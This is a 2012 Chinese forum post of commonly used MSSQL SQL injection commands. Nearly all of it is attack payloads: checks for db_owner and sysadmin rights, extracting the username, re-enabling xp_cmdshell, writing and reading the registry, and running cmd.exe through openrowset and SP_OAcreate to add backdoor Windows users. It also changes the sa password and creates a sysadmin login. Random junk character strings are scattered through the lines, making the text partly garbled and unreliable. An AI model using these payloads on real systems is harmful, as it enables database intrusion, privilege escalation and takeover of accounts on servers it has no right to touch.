标题: 常用的一些注入命令 [打印本页] 作者: admin 时间: 2012-9-15 14:40 标题: 常用的一些注入命令 //看看是什么权限的7 ~2 D" @. y# @1 C* n7 d; I) ~
and 1=(Select IS_MEMBER('db_owner'))6 I$ l/ A4 T; m+ o7 @( V" u
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- 6 l! J& \. }* H+ |' U& w 6 X- \! [. o$ K6 N) x: ]# }4 ]//检测是否有读取某数据库的权限4 [% B3 b! b$ L' f& b) {! ~
and 1= (Select HAS_DBACCESS('master')) " g+ _, s8 N8 Q1 M, a) ?And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- $ e* Y6 F: b& n) I" Z( Z% P6 T1 Z% n5 x: X0 o
1 J8 ^3 e r/ K! G) R3 [数字类型 ) w) }& O# ` [3 O' }! }) n- xand char(124)%2Buser%2Bchar(124)=0+ T2 n, D/ |& ]% k9 o& `
3 u% u' V' M) p: U0 T
字符类型* p) W6 q' x$ e; S* b$ Y+ k
' and char(124)%2Buser%2Bchar(124)=0 and ''='' P* _, c1 q+ [+ @
" g. {6 e# o; p* w搜索类型 3 e- K, `; `" E- q1 z o' and char(124)%2Buser%2Bchar(124)=0 and '%'='4 V" T' @& {6 Q- I; J
; Z; {4 q6 ~" U. W+ l1 @) ]
爆用户名+ w* G& B. B) }- X
and user>0 + ~8 F. m( S; ?) N- c }' and user>0 and ''=' 9 K! y4 m: a& l# l9 G& d) S( C2 i8 l6 Y5 {
检测是否为SA权限3 i7 Q5 M4 \# |! r# c: p* L, ?9 H
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--: C7 K) k; k+ A& N. q% _
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --' i# V7 d- O' p8 O1 o; R, b m; B
3 b- H; `) ]1 b* A* n# W/ H$ c检测是不是MSSQL数据库7 H. u: g8 o$ @% Q5 F2 k' y
and exists (select * from sysobjects);-- ( G+ S% F4 I! [# y+ Z+ y. n( i: [% d 0 \2 ^8 V; `4 |4 R; M$ M检测是否支持多行. _0 e4 u6 @9 y
;declare @d int;--- l$ p# w% M/ B7 x& J6 c
# Q. m! P0 c' X G) N' ?
恢复 xp_cmdshell 2 E7 P5 A r+ n* m2 R;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--( r# U$ q, B5 K2 n# I+ h8 Z
, g8 S, g/ B) Z+ J3 X- C7 V4 ^6 }9 ~, r
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') ( o, I% R! Q7 L, s; L % S( Q( i1 | j. z/ e& P, U//-----------------------3 o3 ~+ G O, Z- T; x6 L
// 执行命令 + q$ @9 r, m3 w//-----------------------8 q, Q0 P8 ~5 c$ M4 W' Y
首先开启沙盘模式:) e9 {3 T+ s: r+ H" q- W3 f+ O2 f
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 ; E/ I3 ]" r/ J- e 1 a, u+ _8 O6 t: ]# ?$ L1 N2 Z$ a然后利用jet.oledb执行系统命令8 O K2 A5 }6 Q# u- f1 K7 S
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')) d2 G2 ^" a& L
( C$ d( x0 ~% P* B执行命令 8 K) s* _" D) e# O3 `- ?;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';-- 1 K+ ~- Q1 b. E2 N. m; g% s0 q* V& G7 J: {3 U
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111' % X4 G$ x; {3 U2 n/ o2 M% O % b" [9 j+ r; ]$ v$ D( p+ @# ]6 }判断xp_cmdshell扩展存储过程是否存在: 9 f1 e' x7 y/ M& a7 \8 Uhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') ' R8 E0 m- i7 A- e( | 5 g& U1 l8 F. U$ \- i# d写注册表 7 ^9 I# H+ v+ v0 f2 j+ Y# b- M$ Aexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',13 U8 Y. G5 l4 j! _* U
' e" t S, }. tREG_SZ * O4 b( R8 L7 q! m& h- x 2 S, Z' p: b p' k: Y读注册表 , O9 g3 T1 G% t6 I) L$ c- U9 Vexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit' h9 ~( e8 i+ a/ @0 U
% x/ j; X; N+ a! g( H读取目录内容 & y8 W( i0 M8 `) y5 texec master..xp_dirtree 'c:\winnt\system32\',1,1' I6 C% y! h( j1 [
, n2 X- y) F) z5 r* I
+ _: K% ]# E: d2 r5 i# @8 t8 U
数据库备份, y, Q) M6 N3 D' P4 X
backup database pubs to disk = 'c:\123.bak'6 Q8 |1 U- H- b& t" }
0 `) v, ^, g1 [//爆出长度: r! o9 N6 j+ \ G* x
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;-- & j. a6 K2 n! Q8 {) t $ F5 D" ~) \& | & E2 v% b/ Z' B2 M9 y$ X0 g 6 ^( }: L: P7 j4 V更改sa口令方法:用sql综合利用工具连接后,执行命令:! w# Q0 r0 G+ _) E& ?& |+ }' n2 w
exec sp_password NULL,'新密码','sa' 8 i9 Q3 e: t' ^- R: R8 u6 J" O9 H D5 \) _2 K0 T. F
添加和删除一个SA权限的用户test:- B& T$ e9 {% I1 N9 }8 @7 X
exec master.dbo.sp_addlogin test,9530772 % N- C# ]5 _% i- W6 x. e3 gexec master.dbo.sp_addsrvrolemember test,sysadmin' K! s5 [) U" n3 ?0 a